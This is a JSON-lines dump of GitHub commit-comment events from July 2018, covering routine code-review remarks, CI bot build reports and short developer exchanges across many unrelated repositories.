{"id":"8013082032","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29820904,"position":null,"line":null,"path":null,"commit_id":"36fa554d6db302b15f0c1b533dfe67a3a8ef885a","created_at":"2018-07-24T22:19:58Z","updated_at":"2018-07-24T22:19:58Z","author_association":"MEMBER","body":"This will likely cause a few issues but will save us work in the long run. The gist here is that if we deviate from GH style (like in the site header), we have to add selectors to the base link color group."}},"created_at":"2018-07-24T22:19:58Z"}
{"id":"8013083170","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/Fly26"},"payload":{"comment":{"id":29820905,"position":null,"line":null,"path":null,"commit_id":"52fd57b0dd42e99df0f9099e89e95513738fb848","created_at":"2018-07-24T22:20:17Z","updated_at":"2018-07-24T22:20:17Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: .poggit.yml does not contain the 'projects'\nattribute\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/Fly26/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `bd737316-8f8f-11e8-8e51-faf55d8eedc3`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T22:20:17Z"}
{"id":"8013085735","type":"CommitCommentEvent","actor":{"login":"quantum5"},"repo":{"name":"DMOJ/judge"},"payload":{"comment":{"id":29820910,"position":7,"line":207,"path":"dmoj/executors/java_executor.py","commit_id":"ccd7dfad6829e14fdb9827e8170a15957cf5aa6a","created_at":"2018-07-24T22:20:58Z","updated_at":"2018-07-24T22:20:58Z","author_association":"MEMBER","body":"Encode?\r\n\r\n```pytb\r\n>>> '\\xd1\\xd1'.decode('utf-8')\r\n\r\nTraceback (most recent call last):\r\n  File \"<pyshell#8>\", line 1, in <module>\r\n    '\\xd1\\xd1'.decode('utf-8')\r\n  File \"C:\\Python27\\lib\\encodings\\utf_8.py\", line 16, in decode\r\n    return codecs.utf_8_decode(input, errors, True)\r\nUnicodeDecodeError: 'utf8' codec can't decode byte 0xd1 in position 0: invalid continuation byte\r\n```"}},"created_at":"2018-07-24T22:20:58Z"}
{"id":"8013086188","type":"CommitCommentEvent","actor":{"login":"Einheit-101"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29820912,"position":null,"line":null,"path":null,"commit_id":"e31ff918cf3fd53c049c7cdf0cdf7a0e413a0a9e","created_at":"2018-07-24T22:21:07Z","updated_at":"2018-07-24T22:21:07Z","author_association":"NONE","body":"setPedsLODDistance does not return true when successful, instead it returns a float containing the LOD distance that just got set."}},"created_at":"2018-07-24T22:21:07Z"}
{"id":"8013086265","type":"CommitCommentEvent","actor":{"login":"jaapaurelio"},"repo":{"name":"2HitAdam/laradock"},"payload":{"comment":{"id":29820913,"position":null,"line":null,"path":null,"commit_id":"c272f4ca1e22521236a6e78ce3939309f053220b","created_at":"2018-07-24T22:21:08Z","updated_at":"2018-07-24T22:21:08Z","author_association":"NONE","body":"Great work! This fixed my `Class 'V8Js' not found` problem.\r\n\r\nNot sure if it's ready to pull request though, it's not working with PHP7.1 and on the workspace code to install v8js looks cleaner.\r\n\r\nThanks again."}},"created_at":"2018-07-24T22:21:08Z"}
{"id":"8013088419","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29820917,"position":32,"line":36,"path":"lib/wagon.rb","commit_id":"6e55d7614bc88a918a04a6a4ac196638ccdc0736","created_at":"2018-07-24T22:21:43Z","updated_at":"2018-07-24T22:21:43Z","author_association":"NONE","body":"вот здесь аналогично train\r\nпроверка на company_name.size и проверка на типы вагонов - никак между собой не связаны. \r\n\r\nПоэтому не нужно никаких if, elsif, нужно два независимых друг от друга raise if\r\n\r\nЭту же ошибку нужно проверить во всех методах validate!"}},"created_at":"2018-07-24T22:21:43Z"}
{"id":"8013119381","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29820988,"position":null,"line":null,"path":null,"commit_id":"39df990d6810091e85676d79e3d11135d85f7bff","created_at":"2018-07-24T22:30:23Z","updated_at":"2018-07-24T22:30:23Z","author_association":"COLLABORATOR","body":"<h3>[select] common test suite for all components (#2646)</h3>\n\nPreview: <strong><a href='https://19111-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19111-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19111-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-24T22:30:23Z"}
{"id":"8013119521","type":"CommitCommentEvent","actor":{"login":"HenryLeongStat"},"repo":{"name":"vatlab/sos-r"},"payload":{"comment":{"id":29820989,"position":null,"line":null,"path":null,"commit_id":"cc92d18bd2ffdb402a41f0789a536ecea41fc6bb","created_at":"2018-07-24T22:30:25Z","updated_at":"2018-07-24T22:30:25Z","author_association":"MEMBER","body":"#9 "}},"created_at":"2018-07-24T22:30:25Z"}
{"id":"8013119901","type":"CommitCommentEvent","actor":{"login":"jesecov"},"repo":{"name":"MicroAsif/aspnet-core-mvc-master-details-app"},"payload":{"comment":{"id":29820992,"position":null,"line":null,"path":null,"commit_id":"c4dc553290322e828ec42e75f077d461f4006c83","created_at":"2018-07-24T22:30:32Z","updated_at":"2018-07-24T22:30:32Z","author_association":"NONE","body":"Great Effort.\r\n\r\nDo you have Edit Order Form ?"}},"created_at":"2018-07-24T22:30:32Z"}
{"id":"8013129511","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29821001,"position":5,"line":17,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"aeb4b8fc82c2566c53fff640c3cafe5e2efeead9","created_at":"2018-07-24T22:33:19Z","updated_at":"2018-07-24T22:33:19Z","author_association":"OWNER","body":"> Practical applications include object detection, semantic segmentation and classification, and automatic mapping of general-interest features such as turn lane markings on roads, parking lots, roads, water, building footprints.\r\n\r\nLet's take out classification:\r\n```\r\nPractical applications include object detection, semantic segmentation and automatic mapping of general-interest features such as turn lane markings on roads, parking lots, roads, water, building footprints.\r\n```\r\n"}},"created_at":"2018-07-24T22:33:19Z"}
{"id":"8013131120","type":"CommitCommentEvent","actor":{"login":"DennisLoska"},"repo":{"name":"DennisLoska/it-recht"},"payload":{"comment":{"id":29821006,"position":null,"line":null,"path":null,"commit_id":"c0105d45823b0020a128f9a3055cc4ddaea67e50","created_at":"2018-07-24T22:33:45Z","updated_at":"2018-07-24T22:33:45Z","author_association":"OWNER","body":"Danke für die genaueren Erklärungen :)"}},"created_at":"2018-07-24T22:33:45Z"}
{"id":"8013132132","type":"CommitCommentEvent","actor":{"login":"HenryLeongStat"},"repo":{"name":"vatlab/sos-r"},"payload":{"comment":{"id":29821013,"position":8,"line":45,"path":"src/sos_r/kernel.py","commit_id":"cc92d18bd2ffdb402a41f0789a536ecea41fc6bb","created_at":"2018-07-24T22:34:04Z","updated_at":"2018-07-24T22:34:04Z","author_association":"MEMBER","body":"Somehow if I don't add `import numpy` here, it will fail:\r\n`UnboundLocalError: local variable 'numpy' referenced before assignment`"}},"created_at":"2018-07-24T22:34:04Z"}
{"id":"8013140704","type":"CommitCommentEvent","actor":{"login":"VYUN"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29821037,"position":200,"line":93,"path":"rpi/stepper.py","commit_id":"e50f44855d8867704da9a8bf83bb61e0788d6a56","created_at":"2018-07-24T22:36:37Z","updated_at":"2018-07-24T22:36:37Z","author_association":"COLLABORATOR","body":"It's non-blocking...according to some random internet comment. Though the operation is probably fast enough that this isn't too much of an issue? "}},"created_at":"2018-07-24T22:36:37Z"}
{"id":"8013141840","type":"CommitCommentEvent","actor":{"login":"izeye"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29821038,"position":4,"line":66,"path":"micrometer-core/src/main/java/io/micrometer/core/instrument/binder/system/UptimeMetrics.java","commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T22:36:56Z","updated_at":"2018-07-24T22:36:56Z","author_association":"COLLABORATOR","body":"Based on the discussion from https://github.com/micrometer-metrics/micrometer/pull/727#issuecomment-406128160, I thought that the breaking change was intentional although it's unfortunate that there was no follow-up before a release."}},"created_at":"2018-07-24T22:36:56Z"}
{"id":"8013145888","type":"CommitCommentEvent","actor":{"login":"deytell"},"repo":{"name":"deytell/website"},"payload":{"comment":{"id":29821045,"position":null,"line":null,"path":null,"commit_id":"b825f0bca38d6a8a1ea48f1a45b9b235f854634e","created_at":"2018-07-24T22:38:08Z","updated_at":"2018-07-24T22:38:08Z","author_association":"OWNER","body":"## Commit Comment"}},"created_at":"2018-07-24T22:38:08Z"}
{"id":"8013147873","type":"CommitCommentEvent","actor":{"login":"jasonlttl"},"repo":{"name":"jasonlttl/ele"},"payload":{"comment":{"id":29821051,"position":null,"line":null,"path":null,"commit_id":"92ee968de0cc5cb4f186af07fca90880e671e832","created_at":"2018-07-24T22:38:43Z","updated_at":"2018-07-24T22:38:43Z","author_association":"OWNER","body":"Created multidev environment [ele#ci-1](https://dashboard.pantheon.io/sites/7ed780fb-f05f-4119-9526-e0afaf179704#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-ele.pantheonsite.io/)"}},"created_at":"2018-07-24T22:38:43Z"}
{"id":"8013149676","type":"CommitCommentEvent","actor":{"login":"imakou"},"repo":{"name":"imakou/Movei-Stock"},"payload":{"comment":{"id":29821060,"position":null,"line":null,"path":null,"commit_id":"97d580027efc060ae0a30028bb58493c01b5fd9d","created_at":"2018-07-24T22:39:16Z","updated_at":"2018-07-24T22:39:16Z","author_association":"OWNER","body":"I've refactored the actions as a meaningful structure in [`MovieActions.js`](https://github.com/imakou/Movei-Stock/commit/97d580027efc060ae0a30028bb58493c01b5fd9d#diff-e36955584952ed4e7c8bf7c16333eb01). \r\n\r\nBut, I don't know how to refactor the reducer as a meaningful structure in `initialState` since the `popMovies` just suppose to be an array `[]`.\r\n"}},"created_at":"2018-07-24T22:39:16Z"}
{"id":"8013160189","type":"CommitCommentEvent","actor":{"login":"pawosm-arm"},"repo":{"name":"ThePortlandGroup/flang-stage"},"payload":{"comment":{"id":29821080,"position":null,"line":null,"path":null,"commit_id":"244ed8e8feca54c811b21f75459182dd0e842868","created_at":"2018-07-24T22:42:24Z","updated_at":"2018-07-24T22:42:24Z","author_association":"NONE","body":"Doesn't seem to fix Flang issue #501.\r\n"}},"created_at":"2018-07-24T22:42:24Z"}
{"id":"8013163153","type":"CommitCommentEvent","actor":{"login":"alfinoc"},"repo":{"name":"alfinoc/leds"},"payload":{"comment":{"id":29821088,"position":37,"line":37,"path":"server/static/grid.html","commit_id":"a71f0f7a82092262888bfaaf03b4bdc9d942a372","created_at":"2018-07-24T22:43:17Z","updated_at":"2018-07-24T22:43:17Z","author_association":"OWNER","body":"pff rules are meant to be broken"}},"created_at":"2018-07-24T22:43:17Z"}
{"id":"8013166228","type":"CommitCommentEvent","actor":{"login":"Chiiruno"},"repo":{"name":"bakape/meguca"},"payload":{"comment":{"id":29821095,"position":null,"line":null,"path":null,"commit_id":"f0e56792023da355370a089906edb1124b8ae820","created_at":"2018-07-24T22:44:10Z","updated_at":"2018-07-24T22:44:10Z","author_association":"COLLABORATOR","body":"@bakape Why not have meguca itself download that?"}},"created_at":"2018-07-24T22:44:10Z"}
{"id":"8013167897","type":"CommitCommentEvent","actor":{"login":"kimplove"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29821099,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T22:44:42Z","updated_at":"2018-07-24T22:44:42Z","author_association":"NONE","body":"Good project\n\n2018년 7월 25일 (수) 오전 6:28, sirathashimi <notifications@github.com>님이 작성:\n\n> Join my telegram guys to get the best airdrop alerts.\n> https://t.me/highpayoutairdrops\n>\n> On Tuesday, July 24, 2018, MahmoudHreitani <notifications@github.com>\n> wrote:\n>\n> > good project\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29819459\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/Am4jXXKewAjsa2SNiHhE_QQJ7WzYeYwqks5uJ4CWgaJpZM4VaEAl\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29820297>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKK2gqSVcO8vOEiMZyACIbueRxLn0XYZks5uJ5GZgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-24T22:44:42Z"}
{"id":"8013172057","type":"CommitCommentEvent","actor":{"login":"hiranya911"},"repo":{"name":"golang/sys"},"payload":{"comment":{"id":29821110,"position":null,"line":null,"path":null,"commit_id":"e072cadbbdc8dd3d3ffa82b8b4b9304c261d9311","created_at":"2018-07-24T22:45:57Z","updated_at":"2018-07-24T22:45:57Z","author_association":"NONE","body":"This breaks on Golang 1.6. See https://github.com/golang/go/issues/26576"}},"created_at":"2018-07-24T22:45:57Z"}
{"id":"8013174218","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/Fly26"},"payload":{"comment":{"id":29821114,"position":null,"line":null,"path":null,"commit_id":"bb10f03cbf6797d5e2e7e4e3c41e8c240d097d81","created_at":"2018-07-24T22:46:35Z","updated_at":"2018-07-24T22:46:35Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: .poggit.yml does not contain the 'projects'\nattribute\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/Fly26/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `6a45b45c-8f93-11e8-80af-b658a2a0206e`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T22:46:35Z"}
{"id":"8013174400","type":"CommitCommentEvent","actor":{"login":"ajschilt86"},"repo":{"name":"Chaelor/City-Nao"},"payload":{"comment":{"id":29821115,"position":null,"line":null,"path":null,"commit_id":"206bf4d73246d388d42ef2c6cec3db489cee136d","created_at":"2018-07-24T22:46:39Z","updated_at":"2018-07-24T22:46:39Z","author_association":"COLLABORATOR","body":"Loooks gooood"}},"created_at":"2018-07-24T22:46:39Z"}
{"id":"8013174586","type":"CommitCommentEvent","actor":{"login":"ckanani87"},"repo":{"name":"ckanani87/Startup"},"payload":{"comment":{"id":29821116,"position":null,"line":null,"path":null,"commit_id":"222372de3f1a831d7a26b78f56122b9019d4a582","created_at":"2018-07-24T22:46:42Z","updated_at":"2018-07-24T22:46:42Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-24T22:46:42Z"}
{"id":"8013179629","type":"CommitCommentEvent","actor":{"login":"mchlp"},"repo":{"name":"brandongit2/math"},"payload":{"comment":{"id":29821125,"position":null,"line":null,"path":null,"commit_id":"36b979ec46258d21dee79021f96ee48cee1e1f94","created_at":"2018-07-24T22:48:20Z","updated_at":"2018-07-24T22:48:20Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Watch all files](https://trello.com/c/iXCSyUBc/1-watch-all-files)"}},"created_at":"2018-07-24T22:48:20Z"}
{"id":"8013180844","type":"CommitCommentEvent","actor":{"login":"awesmdiver"},"repo":{"name":"paypal/payflow-gateway"},"payload":{"comment":{"id":29821129,"position":null,"line":null,"path":null,"commit_id":"71801df03d9a45eac0979d92cbc878691ee85a0c","created_at":"2018-07-24T22:48:43Z","updated_at":"2018-07-24T22:48:43Z","author_association":"COLLABORATOR","body":"Required Java 7+ for TLS support."}},"created_at":"2018-07-24T22:48:43Z"}
{"id":"8013183144","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29821133,"position":1,"line":1,"path":"lesson2/fib.rb","commit_id":"a4f9d034eefa8ba8f315aaac60a05f857462078b","created_at":"2018-07-24T22:49:24Z","updated_at":"2018-07-24T22:49:24Z","author_association":"NONE","body":"тут не нужна ;"}},"created_at":"2018-07-24T22:49:24Z"}
{"id":"8013183202","type":"CommitCommentEvent","actor":{"login":"bakape"},"repo":{"name":"bakape/meguca"},"payload":{"comment":{"id":29821134,"position":null,"line":null,"path":null,"commit_id":"f0e56792023da355370a089906edb1124b8ae820","created_at":"2018-07-24T22:49:25Z","updated_at":"2018-07-24T22:49:25Z","author_association":"OWNER","body":"Automatically on boot? "}},"created_at":"2018-07-24T22:49:25Z"}
{"id":"8013183871","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/Fly26"},"payload":{"comment":{"id":29821136,"position":null,"line":null,"path":null,"commit_id":"3980e80bac69e54a5eb7d6d3381d64e396c166fc","created_at":"2018-07-24T22:49:37Z","updated_at":"2018-07-24T22:49:37Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: .poggit.yml does not contain the 'projects'\nattribute\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/Fly26/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `d63617e2-8f93-11e8-9432-146011a5ac4f`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T22:49:37Z"}
{"id":"8013184618","type":"CommitCommentEvent","actor":{"login":"Chiiruno"},"repo":{"name":"bakape/meguca"},"payload":{"comment":{"id":29821137,"position":null,"line":null,"path":null,"commit_id":"f0e56792023da355370a089906edb1124b8ae820","created_at":"2018-07-24T22:49:50Z","updated_at":"2018-07-24T22:49:50Z","author_association":"COLLABORATOR","body":"If not detected, yes."}},"created_at":"2018-07-24T22:49:50Z"}
{"id":"8013185683","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29821142,"position":null,"line":null,"path":null,"commit_id":"2f43898086941d7ee1d5608b12eb5c1ce9d36708","created_at":"2018-07-24T22:50:09Z","updated_at":"2018-07-24T22:50:09Z","author_association":"NONE","body":"My pleasure :)\r\n\r\nIn case if we couldn't figure out a solution about the path this week, I can take over the work on linking the css file to Java source, so no worries."}},"created_at":"2018-07-24T22:50:09Z"}
{"id":"8013187158","type":"CommitCommentEvent","actor":{"login":"bakape"},"repo":{"name":"bakape/meguca"},"payload":{"comment":{"id":29821144,"position":null,"line":null,"path":null,"commit_id":"f0e56792023da355370a089906edb1124b8ae820","created_at":"2018-07-24T22:50:35Z","updated_at":"2018-07-24T22:50:35Z","author_association":"OWNER","body":"Feel free to add it.\n\nOn 25 July 2018 at 01:49, チルノ <notifications@github.com> wrote:\n\n> If not detected, yes.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bakape/meguca/commit/f0e56792023da355370a089906edb1124b8ae820#commitcomment-29821137>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHfPsEujs-6DXUgGugcr005_YiYltrLfks5uJ6SOgaJpZM4VfGpd>\n> .\n>\n"}},"created_at":"2018-07-24T22:50:35Z"}
{"id":"8013187356","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29821145,"position":20,"line":20,"path":"lesson2/fib.rb","commit_id":"a4f9d034eefa8ba8f315aaac60a05f857462078b","created_at":"2018-07-24T22:50:39Z","updated_at":"2018-07-24T22:50:39Z","author_association":"NONE","body":"не большой рефакторинг\r\n\r\n```\r\narr=[0, 1]\r\n\r\ni = 0\r\nloop do \r\n  arr <<  arr[i-1] + arr[i-2]\r\n  if arr[i] > 100\r\n    arr.pop\r\n    break\r\n  end\r\n  i += 1\r\n\r\nend\r\n```"}},"created_at":"2018-07-24T22:50:39Z"}
{"id":"8013193167","type":"CommitCommentEvent","actor":{"login":"Chiiruno"},"repo":{"name":"bakape/meguca"},"payload":{"comment":{"id":29821164,"position":null,"line":null,"path":null,"commit_id":"f0e56792023da355370a089906edb1124b8ae820","created_at":"2018-07-24T22:52:24Z","updated_at":"2018-07-24T22:52:24Z","author_association":"COLLABORATOR","body":"I'll make an issue, then."}},"created_at":"2018-07-24T22:52:24Z"}
{"id":"8013193564","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29821166,"position":20,"line":20,"path":"lesson2/fib.rb","commit_id":"a4f9d034eefa8ba8f315aaac60a05f857462078b","created_at":"2018-07-24T22:52:32Z","updated_at":"2018-07-24T22:52:32Z","author_association":"NONE","body":"я просто сразу в массив положил два начальных значения, и использовал << вместо arr[i] и код стал намного короче. "}},"created_at":"2018-07-24T22:52:32Z"}
{"id":"8013194027","type":"CommitCommentEvent","actor":{"login":"marionalberty"},"repo":{"name":"dswinters/BowChain"},"payload":{"comment":{"id":29821167,"position":null,"line":null,"path":null,"commit_id":"f0a388dd56e366f4a9437d35552fad89a2917fff","created_at":"2018-07-24T22:52:41Z","updated_at":"2018-07-24T22:52:41Z","author_association":"COLLABORATOR","body":"Changed the values given to gridded.x as the linear interpolation doesn't assume the chain is hanging straight in the water but rather that there is a linear relationship between pressure and sensor position along the line. Also made those values negative to be consistent in sign with cm_catenary."}},"created_at":"2018-07-24T22:52:41Z"}
{"id":"8013197690","type":"CommitCommentEvent","actor":{"login":"bakape"},"repo":{"name":"bakape/meguca"},"payload":{"comment":{"id":29821174,"position":null,"line":null,"path":null,"commit_id":"f0e56792023da355370a089906edb1124b8ae820","created_at":"2018-07-24T22:53:49Z","updated_at":"2018-07-24T22:53:49Z","author_association":"OWNER","body":"There is no need to make an issue, unless you plan to not work on it soon.\nI use them as a TODO list of sorts.\n\nOn 25 July 2018 at 01:52, チルノ <notifications@github.com> wrote:\n\n> I'll make an issue, then.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bakape/meguca/commit/f0e56792023da355370a089906edb1124b8ae820#commitcomment-29821164>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHfPsLui_e5eOFgeExN_i-Bwh7EEzmGnks5uJ6UpgaJpZM4VfGpd>\n> .\n>\n"}},"created_at":"2018-07-24T22:53:49Z"}
{"id":"8013200169","type":"CommitCommentEvent","actor":{"login":"Chiiruno"},"repo":{"name":"bakape/meguca"},"payload":{"comment":{"id":29821180,"position":null,"line":null,"path":null,"commit_id":"f0e56792023da355370a089906edb1124b8ae820","created_at":"2018-07-24T22:54:36Z","updated_at":"2018-07-24T22:54:36Z","author_association":"COLLABORATOR","body":"That's how I'm using them too, I'm trying to work on previous issues where I can before moving onto new ones."}},"created_at":"2018-07-24T22:54:36Z"}
{"id":"8013200514","type":"CommitCommentEvent","actor":{"login":"bookgem"},"repo":{"name":"bookgem/20180724_note"},"payload":{"comment":{"id":29821181,"position":1,"line":1,"path":"README.md","commit_id":"b5fe0fd90eb39c85ddca478df4a142903f126137","created_at":"2018-07-24T22:54:44Z","updated_at":"2018-07-24T22:54:44Z","author_association":"OWNER","body":"what is that\r\n"}},"created_at":"2018-07-24T22:54:44Z"}
{"id":"8013200651","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29821182,"position":null,"line":null,"path":null,"commit_id":"d3c30edb019256f5cca80c3fe617fa5ab88c48f2","created_at":"2018-07-24T22:54:47Z","updated_at":"2018-07-24T22:54:47Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/d3c30edb019256f5cca80c3fe617fa5ab88c48f2/index.html"}},"created_at":"2018-07-24T22:54:47Z"}
{"id":"8013203004","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29821189,"position":null,"line":null,"path":null,"commit_id":"76435350433c3d6b2506ca9d28441f3c63d973ed","created_at":"2018-07-24T22:55:31Z","updated_at":"2018-07-24T22:55:31Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-275](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-275).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-275-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T22:55:31Z"}
{"id":"8013204592","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29821192,"position":null,"line":null,"path":null,"commit_id":"26b500ab278c672277d3b3fd8b99f888d6a452c9","created_at":"2018-07-24T22:55:59Z","updated_at":"2018-07-24T22:55:59Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/27/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/27//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/26b500ab278c672277d3b3fd8b99f888d6a452c9/27/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/26b500ab278c672277d3b3fd8b99f888d6a452c9/27/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/26b500ab278c672277d3b3fd8b99f888d6a452c9/27/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/master/26b500ab278c672277d3b3fd8b99f888d6a452c9/27/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-24T22:55:59Z"}
{"id":"8013207851","type":"CommitCommentEvent","actor":{"login":"krizky82"},"repo":{"name":"kirkhan93/kernel_xiaomi_whyred"},"payload":{"comment":{"id":29821206,"position":7,"line":86,"path":"drivers/devfreq/Kconfig","commit_id":"8709df2937d6f69960da3eeb0186d9d2c0d95e8b","created_at":"2018-07-24T22:57:00Z","updated_at":"2018-07-24T22:57:00Z","author_association":"NONE","body":"the name of DEVFREQ_GOV_MSM_ADRENO_TZ is altered to DEVFREQ_GOV_QCOM_ADRENO_TZ in recent CAF kernel"}},"created_at":"2018-07-24T22:57:00Z"}
{"id":"8013211056","type":"CommitCommentEvent","actor":{"login":"Asong1107"},"repo":{"name":"Asong1107/Task8"},"payload":{"comment":{"id":29821212,"position":null,"line":null,"path":null,"commit_id":"605d00ed92e161ae77a859e8723582ccdd4f038a","created_at":"2018-07-24T22:58:02Z","updated_at":"2018-07-24T22:58:02Z","author_association":"OWNER","body":"服务端上传"}},"created_at":"2018-07-24T22:58:02Z"}
{"id":"8013218836","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29821228,"position":null,"line":null,"path":null,"commit_id":"13a757210913853dae7c4a1cbbadff149d399f23","created_at":"2018-07-24T23:00:24Z","updated_at":"2018-07-24T23:00:24Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2032/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 20472 seconds\n\nTests produced 2792 warnings. 2792 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-24T23:00:24Z"}
